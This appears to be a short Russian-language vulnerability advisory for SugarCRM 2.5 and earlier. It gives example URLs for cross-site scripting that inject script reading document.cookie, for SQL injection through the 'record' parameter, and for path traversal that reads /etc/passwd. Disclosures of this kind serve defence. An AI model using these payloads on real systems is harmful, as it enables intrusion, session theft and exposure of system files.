Программа: SugarCRM 2.5 и более ранние версии
Удаленный атакующий может выполнить произвольный SQL код, произвести XSS нападение и просмотреть произвольные файлы на уязвимой системе.
Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере целевого пользователя.
Примеры:
/index.php?action=UnifiedSearch&module=Home&search_form= false&query_string=%22%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E
/index.php?module=Accounts&action=ListView&query= true&name=[XSS]
/index.php?action=index&module=Home&mod_strings
[LNK_NEW_CONTACT]=%3Cscript%3Ealert(document.cookie) %3C/script%3E
/modules/Users/Error.php?app_strings[NTC_CLICK_BACK]= %3Cscript%3Ealert(document.cookie)%3C/script%3E
Удаленный атакующий может выполнить SQL-инъекцию. Уязвимость существует из-за некорректной обработки входных данных в переменной
'record'.
Пример:
index.php?action=DetailView&module=Accounts&record=[SQL]
Удаленный атакующий может просмотреть произвольные файлы на уязвимой системе с привилегиями web сервера. Примеры:
/index.php?module=Opportunities&action= ../../../../../../../../et c/passwd%00&advanced=true
/index.php?action=DetailView&module= ../../../../../etc/passwd%00